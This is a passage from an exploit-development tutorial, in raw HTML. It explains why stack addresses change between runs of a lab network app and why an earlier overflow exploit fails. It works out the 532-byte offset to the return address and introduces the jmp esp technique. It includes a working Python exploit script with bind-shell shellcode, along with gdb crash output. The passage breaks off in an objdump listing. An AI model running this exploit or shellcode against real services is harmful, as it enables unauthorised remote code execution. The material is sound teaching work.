r--p 0000b000 08:01 783374 /bin/cat/span/span span class="code-line"span class="go"08055000-08056000 rw-p 0000c000 08:01 783374 /bin/cat/span/span span class="code-line"span class="go"0838a000-083ab000 rw-p 00000000 00:00 0 [heap]/span/span span class="code-line"span class="go"b74e9000-b7528000 r--p 00000000 08:01 1066328 /usr/lib/locale/pap_AN/LC_CTYPE/span/span span class="code-line"span class="go"b7528000-b7646000 r--p 00000000 08:01 1066368 /usr/lib/locale/pap_AN/LC_COLLATE/span/span span class="code-line"span class="go"b7646000-b7647000 rw-p 00000000 00:00 0 /span/span span class="code-line"span class="go"b7647000-b77a4000 r-xp 00000000 08:01 1045302 /lib/i386-linux-gnu/i686/cmov/libc-2.13.so/span/span span class="code-line"span class="go"b77a4000-b77a5000 ---p 0015d000 08:01 1045302 /lib/i386-linux-gnu/i686/cmov/libc-2.13.so/span/span span class="code-line"span class="go"b77a5000-b77a7000 r--p 0015d000 08:01 1045302 /lib/i386-linux-gnu/i686/cmov/libc-2.13.so/span/span span class="code-line"span class="go"b77a7000-b77a8000 rw-p 0015f000 08:01 1045302 /lib/i386-linux-gnu/i686/cmov/libc-2.13.so/span/span span class="code-line"span class="go"b77a8000-b77ab000 rw-p 00000000 00:00 0 /span/span span class="code-line"span class="go"b77b7000-b77b8000 r--p 00000000 08:01 961741 /usr/lib/locale/[email protected]/LC_NUMERIC/span/span span class="code-line"span class="go"b77b8000-b77b9000 r--p 00000000 08:01 962466 /usr/lib/locale/en_ZM/LC_TIME/span/span span class="code-line"span class="go"b77b9000-b77ba000 r--p 00000000 08:01 962019 /usr/lib/locale/gv_GB.utf8/LC_MONETARY/span/span span class="code-line"span class="go"b77ba000-b77bb000 r--p 00000000 08:01 1071064 /usr/lib/locale/ne_NP/LC_MESSAGES/SYS_LC_MESSAGES/span/span span class="code-line"span class="go"b77bb000-b77bc000 r--p 00000000 08:01 1065713 /usr/lib/locale/sr_RS/LC_PAPER/span/span span class="code-line"span class="go"b77bc000-b77bd000 r--p 00000000 08:01 962122 /usr/lib/locale/cy_GB.utf8/LC_NAME/span/span span class="code-line"span class="go"b77bd000-b77be000 r--p 00000000 08:01 962015 /usr/lib/locale/gv_GB.utf8/LC_ADDRESS/span/span span class="code-line"span class="go"b77be000-b77bf000 r--p 00000000 08:01 962121 /usr/lib/locale/cy_GB.utf8/LC_TELEPHONE/span/span span class="code-line"span class="go"b77bf000-b77c0000 r--p 00000000 08:01 1066122 /usr/lib/locale/sr_RS/LC_MEASUREMENT/span/span span class="code-line"span class="go"b77c0000-b77c7000 r--s 00000000 08:01 827509 /usr/lib/i386-linux-gnu/gconv/gconv-modules.cache/span/span span class="code-line"span class="go"b77c7000-b77c8000 r--p 00000000 08:01 963555 /usr/lib/locale/en_GB.utf8/LC_IDENTIFICATION/span/span span class="code-line"span class="go"b77c8000-b77ca000 rw-p 00000000 00:00 0 /span/span span class="code-line"span class="go"b77ca000-b77cb000 r-xp 00000000 00:00 0 [vdso]/span/span span class="code-line"span class="go"b77cb000-b77e7000 r-xp 00000000 08:01 1062553 /lib/i386-linux-gnu/ld-2.13.so/span/span span class="code-line"span class="go"b77e7000-b77e8000 r--p 0001b000 08:01 1062553 /lib/i386-linux-gnu/ld-2.13.so/span/span span class="code-line"span class="go"b77e8000-b77e9000 rw-p 0001c000 08:01 1062553 /lib/i386-linux-gnu/ld-2.13.so/span/span span class="code-line"span class="go"bfa32000-bfa53000 rw-p 00000000 00:00 0 [stack]/span/span span class="code-line"span class="gp"[email protected]:~$ /spancat /proc/self/maps/span span class="code-line"span class="go"08048000-08054000 r-xp 00000000 08:01 783374 /bin/cat/span/span span class="code-line"span class="go"08054000-08055000 r--p 0000b000 08:01 783374 /bin/cat/span/span span class="code-line"span class="go"08055000-08056000 rw-p 0000c000 08:01 783374 /bin/cat/span/span span class="code-line"span class="go"08dd9000-08dfa000 rw-p 00000000 00:00 0 [heap]/span/span span class="code-line"span class="go"b74de000-b751d000 r--p 00000000 08:01 1066328 /usr/lib/locale/pap_AN/LC_CTYPE/span/span span class="code-line"span class="go"b751d000-b763b000 r--p 00000000 08:01 1066368 /usr/lib/locale/pap_AN/LC_COLLATE/span/span span class="code-line"span class="go"b763b000-b763c000 rw-p 00000000 00:00 0 /span/span span class="code-line"span class="go"b763c000-b7799000 r-xp 00000000 08:01 1045302 /lib/i386-linux-gnu/i686/cmov/libc-2.13.so/span/span span class="code-line"span class="go"b7799000-b779a000 ---p 0015d000 08:01 1045302 /lib/i386-linux-gnu/i686/cmov/libc-2.13.so/span/span span class="code-line"span class="go"b779a000-b779c000 r--p 0015d000 08:01 1045302 /lib/i386-linux-gnu/i686/cmov/libc-2.13.so/span/span span class="code-line"span class="go"b779c000-b779d000 rw-p 0015f000 08:01 1045302 /lib/i386-linux-gnu/i686/cmov/libc-2.13.so/span/span span class="code-line"span class="go"b779d000-b77a0000 rw-p 00000000 00:00 0 /span/span span class="code-line"span class="go"b77ac000-b77ad000 r--p 00000000 08:01 961741 /usr/lib/locale/[email protected]/LC_NUMERIC/span/span span class="code-line"span class="go"b77ad000-b77ae000 r--p 00000000 08:01 962466 /usr/lib/locale/en_ZM/LC_TIME/span/span span class="code-line"span class="go"b77ae000-b77af000 r--p 00000000 08:01 962019 /usr/lib/locale/gv_GB.utf8/LC_MONETARY/span/span span class="code-line"span class="go"b77af000-b77b0000 r--p 00000000 08:01 1071064 /usr/lib/locale/ne_NP/LC_MESSAGES/SYS_LC_MESSAGES/span/span span class="code-line"span class="go"b77b0000-b77b1000 r--p 00000000 08:01 1065713 /usr/lib/locale/sr_RS/LC_PAPER/span/span span class="code-line"span class="go"b77b1000-b77b2000 r--p 00000000 08:01 962122 /usr/lib/locale/cy_GB.utf8/LC_NAME/span/span span class="code-line"span class="go"b77b2000-b77b3000 r--p 00000000 08:01 962015 /usr/lib/locale/gv_GB.utf8/LC_ADDRESS/span/span span class="code-line"span class="go"b77b3000-b77b4000 r--p 00000000 08:01 962121 /usr/lib/locale/cy_GB.utf8/LC_TELEPHONE/span/span span class="code-line"span class="go"b77b4000-b77b5000 r--p 00000000 08:01 1066122 /usr/lib/locale/sr_RS/LC_MEASUREMENT/span/span span class="code-line"span class="go"b77b5000-b77bc000 r--s 00000000 08:01 827509 /usr/lib/i386-linux-gnu/gconv/gconv-modules.cache/span/span span class="code-line"span class="go"b77bc000-b77bd000 r--p 00000000 08:01 963555 /usr/lib/locale/en_GB.utf8/LC_IDENTIFICATION/span/span span class="code-line"span class="go"b77bd000-b77bf000 rw-p 00000000 00:00 0 /span/span span class="code-line"span class="go"b77bf000-b77c0000 r-xp 00000000 00:00 0 [vdso]/span/span span class="code-line"span class="go"b77c0000-b77dc000 r-xp 00000000 08:01 1062553 /lib/i386-linux-gnu/ld-2.13.so/span/span span class="code-line"span class="go"b77dc000-b77dd000 r--p 0001b000 08:01 1062553 /lib/i386-linux-gnu/ld-2.13.so/span/span span class="code-line"span class="go"b77dd000-b77de000 rw-p 0001c000 08:01 1062553 /lib/i386-linux-gnu/ld-2.13.so/span/span span class="code-line"span class="go"bfad4000-bfaf5000 rw-p 00000000 00:00 0 [stack]/span/span span class="code-line"span class="gp"[email protected]:~$ /spancat /proc/self/maps/span span class="code-line"span class="go"08048000-08054000 r-xp 00000000 08:01 783374 /bin/cat/span/span span class="code-line"span class="go"08054000-08055000 r--p 0000b000 08:01 783374 /bin/cat/span/span span class="code-line"span class="go"08055000-08056000 rw-p 0000c000 08:01 783374 /bin/cat/span/span span class="code-line"span class="go"09908000-09929000 rw-p 00000000 00:00 0 [heap]/span/span span class="code-line"span class="go"b7435000-b7474000 r--p 00000000 08:01 1066328 /usr/lib/locale/pap_AN/LC_CTYPE/span/span span class="code-line"span class="go"b7474000-b7592000 r--p 00000000 08:01 1066368 /usr/lib/locale/pap_AN/LC_COLLATE/span/span span class="code-line"span class="go"b7592000-b7593000 rw-p 00000000 00:00 0 /span/span span class="code-line"span class="go"b7593000-b76f0000 r-xp 00000000 08:01 1045302 /lib/i386-linux-gnu/i686/cmov/libc-2.13.so/span/span span class="code-line"span class="go"b76f0000-b76f1000 ---p 0015d000 08:01 1045302 /lib/i386-linux-gnu/i686/cmov/libc-2.13.so/span/span span class="code-line"span class="go"b76f1000-b76f3000 r--p 0015d000 08:01 1045302 /lib/i386-linux-gnu/i686/cmov/libc-2.13.so/span/span span class="code-line"span class="go"b76f3000-b76f4000 rw-p 0015f000 08:01 1045302 /lib/i386-linux-gnu/i686/cmov/libc-2.13.so/span/span span class="code-line"span class="go"b76f4000-b76f7000 rw-p 00000000 00:00 0 /span/span span class="code-line"span class="go"b7703000-b7704000 r--p 00000000 08:01 961741 /usr/lib/locale/[email protected]/LC_NUMERIC/span/span span class="code-line"span class="go"b7704000-b7705000 r--p 00000000 08:01 962466 /usr/lib/locale/en_ZM/LC_TIME/span/span span class="code-line"span class="go"b7705000-b7706000 r--p 00000000 08:01 962019 /usr/lib/locale/gv_GB.utf8/LC_MONETARY/span/span span class="code-line"span class="go"b7706000-b7707000 r--p 00000000 08:01 1071064 /usr/lib/locale/ne_NP/LC_MESSAGES/SYS_LC_MESSAGES/span/span span class="code-line"span class="go"b7707000-b7708000 r--p 00000000 08:01 1065713 /usr/lib/locale/sr_RS/LC_PAPER/span/span span class="code-line"span class="go"b7708000-b7709000 r--p 00000000 08:01 962122 /usr/lib/locale/cy_GB.utf8/LC_NAME/span/span span class="code-line"span class="go"b7709000-b770a000 r--p 00000000 08:01 962015 /usr/lib/locale/gv_GB.utf8/LC_ADDRESS/span/span span class="code-line"span class="go"b770a000-b770b000 r--p 00000000 08:01 962121 /usr/lib/locale/cy_GB.utf8/LC_TELEPHONE/span/span span class="code-line"span class="go"b770b000-b770c000 r--p 00000000 08:01 1066122 /usr/lib/locale/sr_RS/LC_MEASUREMENT/span/span span class="code-line"span class="go"b770c000-b7713000 r--s 00000000 08:01 827509 /usr/lib/i386-linux-gnu/gconv/gconv-modules.cache/span/span span class="code-line"span class="go"b7713000-b7714000 r--p 00000000 08:01 963555 /usr/lib/locale/en_GB.utf8/LC_IDENTIFICATION/span/span span class="code-line"span class="go"b7714000-b7716000 rw-p 00000000 00:00 0 /span/span span class="code-line"span class="go"b7716000-b7717000 r-xp 00000000 00:00 0 [vdso]/span/span span class="code-line"span class="go"b7717000-b7733000 r-xp 00000000 08:01 1062553 /lib/i386-linux-gnu/ld-2.13.so/span/span span class="code-line"span class="go"b7733000-b7734000 r--p 0001b000 08:01 1062553 /lib/i386-linux-gnu/ld-2.13.so/span/span span class="code-line"span class="go"b7734000-b7735000 rw-p 0001c000 08:01 1062553 /lib/i386-linux-gnu/ld-2.13.so/span/span span class="code-line"span class="go"bfc79000-bfc9a000 rw-p 00000000 00:00 0 [stack]/span/span span class="code-line"/code/pre/div /td/tr/table pThis command displays the memory ranges of each memory segment inside the codecat/code commands own virtual memory space./p pAs you can see, all of the memory segments are changing their ranges except for the top 3. These top 3 belong to the actual code of the application./p pThis means that we can only predict memory addresses of the actual code of the application and nothing that is dynamically loaded or writable./p pEvery payload we have sent until now has been placed on the codestack/code, which is at the very bottom of the memory segment list on the output and this section of memory isn't static so we can no longer predict the address of our payload (the shellcode)./p h2Testing The App/h2 table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~$ /span./app-net/span span class="code-line"/code/pre/div /td/tr/table pWe already know a lot about this application, lets try our exploit from last time:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~$ /spanpython app-net-fuzz.py /span span class="code-line"span class="go"532/span/span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~$ /spangdb -q ./app-net /span span class="code-line"span class="go"Reading symbols from /home/appuser/app-net...(no debugging symbols found)...done./span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"r/span/span span class="code-line"span class="go"Starting program: /home/appuser/app-net /span/span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~$ /spanpython -c span class="s1"#39;print quot;Aquot;*532#39;/span span class="p"|/span nc span class="m"127/span.0.0.1 span class="m"9999/span/span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/span span class="code-line"span class="normal"6/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="go"Program received signal SIGSEGV, Segmentation fault./span/span span class="code-line"span class="go"0x0804000a in ?? ()/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"r/span/span span class="code-line"span class="go"The program being debugged has been started already./span/span span class="code-line"span class="go"Start it from the beginning? (y or n) y/span/span span class="code-line"span class="go"Starting program: /home/appuser/app-net/span/span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~$ /spanpython -c span class="s1"#39;print quot;Aquot;*536#39;/span span class="p"|/span nc span class="m"127/span.0.0.1 span class="m"9999/span/span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="go"Program received signal SIGSEGV, Segmentation fault./span/span span class="code-line"span class="go"0x41414141 in ?? ()/span/span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~$ /span./app-net /span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~# /spanps ax span class="p"|/span grep app-net/span span class="code-line"span class="go"26854 pts/0 S+ 0:00 ./app-net/span/span span class="code-line"span class="go"26951 pts/2 S+ 0:00 grep app-net/span/span span class="code-line"span class="gp"[email protected]:~# /spangdb -q -p span class="m"26854/span/span span class="code-line"span class="go"Attaching to process 26854/span/span span class="code-line"span class="go"Reading symbols from /home/appuser/app-net...(no debugging symbols found)...done./span/span span class="code-line"span class="go"Reading symbols from /lib/i386-linux-gnu/i686/cmov/libc.so.6...(no debugging symbols found)...done./span/span span class="code-line"span class="go"Loaded symbols for /lib/i386-linux-gnu/i686/cmov/libc.so.6/span/span span class="code-line"span class="go"Reading symbols from /lib/ld-linux.so.2...(no debugging symbols found)...done./span/span span class="code-line"span class="go"Loaded symbols for /lib/ld-linux.so.2/span/span span class="code-line"span class="go"0xb77c0424 in __kernel_vsyscall ()/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"c/span/span span class="code-line"span class="go"Continuing./span/span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~$ /spanpython -c span class="s1"#39;print quot;Aquot;*536#39;/span span class="p"|/span nc span class="m"127/span.0.0.1 span class="m"9999/span/span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/span span class="code-line"span class="normal"6/span/span span class="code-line"span class="normal"7/span/span span class="code-line"span class="normal"8/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="go"Program received signal SIGSEGV, Segmentation fault./span/span span class="code-line"span class="go"0x41414141 in ?? ()/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"x/20xw $esp/span/span span class="code-line"span class="go"0xbfaeb670: 0xbfae000a 0xbfaeb694 0x000003e8 0x00000000/span/span span class="code-line"span class="go"0xbfaeb680: 0xbfaeba80 0xbfaeba7c 0x000057a8 0x00000006/span/span span class="code-line"span class="go"0xbfaeb690: 0x00001000 0x41414141 0x41414141 0x41414141/span/span span class="code-line"span class="go"0xbfaeb6a0: 0x41414141 0x41414141 0x41414141 0x41414141/span/span span class="code-line"span class="go"0xbfaeb6b0: 0x41414141 0x41414141 0x41414141 0x41414141/span/span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~$ /span./app-net/span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~$ /spancat app-net-exploit.py /span span class="code-line"span class="gp"#/span!/usr/bin/env python/span span class="code-line"/span span class="code-line"span class="go"import socket/span/span span class="code-line"/span span class="code-line"span class="go"shellcode = quot;\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x17\x31\xdb\xcd\x80\x89\xd8\xb0\x66\xb3\x01\x51\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xb0\x66\xb3\x02\x52\x66\x68\x27\x0e\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x6a\x01\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x05\x52\x52\x56\x89\xe1\xcd\x80\x89\xc3\x31\xc9\xb1\x03\xfe\xc9\xb0\x3f\xcd\x80\x75\xf8\x31\xc0\x52\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xb0\x0b\xcd\x80quot;/span/span span class="code-line"/span span class="code-line"span class="go"payload = quot;\x90quot; * 406 # (532 - 119) - 7 = 406/span/span span class="code-line"/span span class="code-line"span class="go"payload += shellcode # append our shellcode/span/span span class="code-line"/span span class="code-line"span class="go"payload += quot;\x90quot; * 7 # another 7 bytes/span/span span class="code-line"/span span class="code-line"span class="go"payload += quot;\x94\xb6\xae\xbfquot; # the address of our shellcode/span/span span class="code-line"span class="gp" # /spanspan class="k"in/span reverse span class="o"(/spanlittle endianspan class="o")/span/span span class="code-line"/span span class="code-line"span class="gp"# /spancreate the tcp socket/span span class="code-line"span class="go"s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)/span/span span class="code-line"/span span class="code-line"span class="gp"# /spanconnect to span class="m"127/span.0.0.1 port span class="m"9999/span/span span class="code-line"span class="go"s.connect((quot;127.0.0.1quot;, 9999))/span/span span class="code-line"/span span class="code-line"span class="gp"# /spansend our payload/span span class="code-line"span class="go"s.send(payload)/span/span span class="code-line"/span span class="code-line"span class="gp"# /spanclose the socket/span span class="code-line"span class="go"s.close()/span/span span class="code-line"span class="gp"[email protected]:~$ /spanpython app-net-exploit.py /span span class="code-line"span class="gp"[email protected]:~$ /spannc span class="m"127/span.0.0.1 span class="m"9998/span/span span class="code-line"span class="go"nc: unable to connect to address 127.0.0.1, service 9998/span/span span class="code-line"/code/pre/div /td/tr/table pAs you can see, the exploit that we used last time didn't work. The reason for this is because the position of the stack has moved, so the shellcode isn't at the same address everytime the application is launched./p pThe offset here before we start overwriting EIP is 532. I want to explain quickly why this is./p pWe have 3 local variables, codechar p[512];/code (on line 100 of the source) and codeint r, i;/code (on line 101)./p pThese variables go on to the stack in reverse order, so first (closest to the beginning of the a href="https://en.wikipedia.org/wiki/Call_stack#Structure" target="_blank"stack frame/a) codei/code, then coder/code and lastly codep/code./p pWhen writes happen here they happen in the opposite direction, so a write at codep/code will eventually overwrite coder/code (after filling up the reserved space for codep/code) and then codei/code./p pWe are reserving 512 bytes for codep/code, each int is 4 bytes long, so that is 520. The stack has to be aligned to 16 byte boundaries, so we need to add another 8 bytes, making it 528 bytes./p pLastly right under the local variables we have the saved EBP from the calling function, this is another 4 bytes. The return address is stored right after the saved EBP so that takes us to 532 bytes./p h2Returning From A Function/h2 pI explained this in much more detail in part a href="/x86-32-linux/reverse-engineering/2014/07/01/basic-binary-auditing/"4/a but just before a function returns, the stack looks like this:/p pimg src="/assets/images/x86-32-linux/stack2.jpg" width="300"/p pThe strongRET ADDR/strong is what we are overwriting to take control of EIP. What happens next is the strongRET ADDR/strong gets strongpopped/strong off of the stack into the EIP register and the stack then looks like this:/p pimg src="/assets/images/x86-32-linux/stack1.jpg" width="300"/p pThis means that the value of the ESP register will always point to the memory address on the stack right after we overwrite EIP, at 536 bytes into our payload (532 + 4 for EIP)./p pSo if we write our shellcode after we overwrite EIP then we know that ESP is pointing to it./p pAn instruction that is fairly common among all normal sized applications is codejmp esp/code. This instruction tells EIP to point to the address that ESP is pointing to./p pUsing this instruction we can execute our shellcode but first we have to find it in the application's a href="https://en.wikipedia.org/wiki/Code_segment" target="_blank"text segment/a because we know it will never change address if it is in this section./p h2Finding JMP ESP/h2 pFirst let's look at the disassembly using codeobjdump -d ./app-net -M intel/code:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal" 10/span/span span class="code-line"span class="normal" 11/span/span span class="code-line"span class="normal" 12/span/span span class="code-line"span class="normal" 13/span/span span class="code-line"span class="normal" 14/span/span span class="code-line"span class="normal" 15/span/span span class="code-line"span class="normal" 16/span/span span class="code-line"span class="normal" 17/span/span span class="code-line"span class="normal" 18/span/span span class="code-line"span class="normal" 19/span/span span class="code-line"span class="normal" 20/span/span span class="code-line"span class="normal" 21/span/span span class="code-line"span class="normal" 22/span/span span class="code-line"span class="normal" 23/span/span span class="code-line"span class="normal" 24/span/span span class="code-line"span class="normal" 25/span/span span class="code-line"span class="normal" 26/span/span span class="code-line"span class="normal" 27/span/span span class="code-line"span class="normal" 28/span/span span class="code-line"span class="normal" 29/span/span span class="code-line"span class="normal" 30/span/span span class="code-line"span class="normal" 31/span/span span class="code-line"span class="normal" 32/span/span span class="code-line"span class="normal" 33/span/span span class="code-line"span class="normal" 34/span/span span class="code-line"span class="normal" 35/span/span span class="code-line"span class="normal" 36/span/span span class="code-line"span class="normal" 37/span/span span class="code-line"span class="normal" 38/span/span span class="code-line"span class="normal" 39/span/span span class="code-line"span class="normal" 40/span/span span class="code-line"span class="normal" 41/span/span span class="code-line"span class="normal" 42/span/span span class="code-line"span class="normal" 43/span/span span class="code-line"span class="normal" 44/span/span span class="code-line"span class="normal" 45/span/span span class="code-line"span class="normal" 46/span/span span class="code-line"span class="normal" 47/span/span span class="code-line"span class="normal" 48/span/span span class="code-line"span class="normal" 49/span/span span class="code-line"span class="normal" 50/span/span span class="code-line"span class="normal" 51/span/span span class="code-line"span class="normal" 52/span/span span class="code-line"span class="normal" 53/span/span span class="code-line"span class="normal" 54/span/span span class="code-line"span class="normal" 55/span/span span class="code-line"span class="normal" 56/span/span span class="code-line"span class="normal" 57/span/span span class="code-line"span class="normal" 58/span/span span class="code-line"span class="normal" 59/span/span span class="code-line"span class="normal" 60/span/span span class="code-line"span class="normal" 61/span/span span class="code-line"span class="normal" 62/span/span span class="code-line"span class="normal" 63/span/span span class="code-line"span class="normal" 64/span/span span class="code-line"span class="normal" 65/span/span span class="code-line"span class="normal" 66/span/span span class="code-line"span class="normal" 67/span/span span class="code-line"span class="normal" 68/span/span span class="code-line"span class="normal" 69/span/span span class="code-line"span class="normal" 70/span/span span class="code-line"span class="normal" 71/span/span span class="code-line"span class="normal" 72/span/span span class="code-line"span class="normal" 73/span/span span class="code-line"span class="normal" 74/span/span span class="code-line"span class="normal" 75/span/span span class="code-line"span class="normal" 76/span/span span class="code-line"span class="normal" 77/span/span span class="code-line"span class="normal" 78/span/span span class="code-line"span class="normal" 79/span/span span class="code-line"span class="normal" 80/span/span span class="code-line"span class="normal" 81/span/span span class="code-line"span class="normal" 82/span/span span class="code-line"span class="normal" 83/span/span span class="code-line"span class="normal" 84/span/span span class="code-line"span class="normal" 85/span/span span class="code-line"span class="normal" 86/span/span span class="code-line"span class="normal" 87/span/span span class="code-line"span class="normal" 88/span/span span class="code-line"span class="normal" 89/span/span span class="code-line"span class="normal" 90/span/span span class="code-line"span class="normal" 91/span/span span class="code-line"span class="normal" 92/span/span span class="code-line"span class="normal" 93/span/span span class="code-line"span class="normal" 94/span/span span class="code-line"span class="normal" 95/span/span span class="code-line"span class="normal" 96/span/span span class="code-line"span class="normal" 97/span/span span class="code-line"span class="normal" 98/span/span span class="code-line"span class="normal" 99/span/span span class="code-line"span class="normal"100/span/span span class="code-line"span class="normal"101/span/span span class="code-line"span class="normal"102/span/span span class="code-line"span class="normal"103/span/span span class="code-line"span class="normal"104/span/span span class="code-line"span class="normal"105/span/span span class="code-line"span class="normal"106/span/span span class="code-line"span class="normal"107/span/span span class="code-line"span class="normal"108/span/span span class="code-line"span class="normal"109/span/span span class="code-line"span class="normal"110/span/span span class="code-line"span class="normal"111/span/span span class="code-line"span class="normal"112/span/span span class="code-line"span class="normal"113/span/span span class="code-line"span class="normal"114/span/span span class="code-line"span class="normal"115/span/span span class="code-line"span class="normal"116/span/span span class="code-line"span class="normal"117/span/span span class="code-line"span class="normal"118/span/span span class="code-line"span class="normal"119/span/span span class="code-line"span class="normal"120/span/span span class="code-line"span class="normal"121/span/span span class="code-line"span class="normal"122/span/span span class="code-line"span class="normal"123/span/span span class="code-line"span class="normal"124/span/span span class="code-line"span class="normal"125/span/span span class="code-line"span class="normal"126/span/span span class="code-line"span class="normal"127/span/span span class="code-line"span class="normal"128/span/span span class="code-line"span class="normal"129/span/span span class="code-line"span class="normal"130/span/span span class="code-line"span class="normal"131/span/span span class="code-line"span class="normal"132/span/span span class="code-line"span class="normal"133/span/span span class="code-line"span class="normal"134/span/span span class="code-line"span class="normal"135/span/span span class="code-line"span class="normal"136/span/span span class="code-line"span class="normal"137/span/span span class="code-line"span class="normal"138/span/span span class="code-line"span class="normal"139/span/span span class="code-line"span class="normal"140/span/span span class="code-line"span class="normal"141/span/span span class="code-line"span class="normal"142/span/span span class="code-line"span class="normal"143/span/span span class="code-line"span class="normal"144/span/span span class="code-line"span class="normal"145/span/span span class="code-line"span class="normal"146/span/span span class="code-line"span class="normal"147/span/span span class="code-line"span class="normal"148/span/span span class="code-line"span class="normal"149/span/span span class="code-line"span class="normal"150/span/span span class="code-line"span class="normal"151/span/span span class="code-line"span class="normal"152/span/span span class="code-line"span class="normal"153/span/span span class="code-line"span class="normal"154/span/span span class="code-line"span class="normal"155/span/span span class="code-line"span class="normal"156/span/span span class="code-line"span class="normal"157/span/span span class="code-line"span class="normal"158/span/span span class="code-line"span class="normal"159/span/span span class="code-line"span class="normal"160/span/span span class="code-line"span class="normal"161/span/span span class="code-line"span class="normal"162/span/span span class="code-line"span class="normal"163/span/span span class="code-line"span class="normal"164/span/span span class="code-line"span class="normal"165/span/span span class="code-line"span class="normal"166/span/span span class="code-line"span class="normal"167/span/span span 